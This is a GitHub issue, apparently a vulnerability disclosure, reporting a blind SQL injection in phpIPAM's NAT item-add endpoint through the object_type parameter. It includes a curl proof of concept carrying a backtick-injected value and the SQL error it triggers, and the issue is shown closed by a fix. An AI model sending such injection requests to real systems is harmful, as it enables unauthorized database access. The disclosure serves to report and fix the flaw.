New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Blind SQL Injection (/app/admin/nat/item-add-submit.php) #2344

Closed
magicOz opened this Issue Dec 3, 2018 · 0 comments

Comments

Projects
None yet
1 participant
@magicOz
Copy link

magicOz commented Dec 3, 2018

In parameter object_type in the file /app/admin/nat/item-add-submit.php at line 95.
$item = $Tools->fetch_object ($obj_type, "id", $obj_id);

PoC:
curl -d 'id=2&type=src&object_type=subnets`&object_id=63' -H "Cookie: PHPSESSID=4d83803c9b07e2155a9d381429b30476" "https://demo.phpipam.net/app/admin/nat/item-add-submit.php"

<div class='alert alert-danger'>Error: SQLSTATE[42000]: Syntax error or access violation: 1103 Incorrect table name 'subnets` where '</div><div class='alert alert-danger'>Invalid object identifier</div>

@GaryAllan GaryAllan closed this in 856b10c Dec 4, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment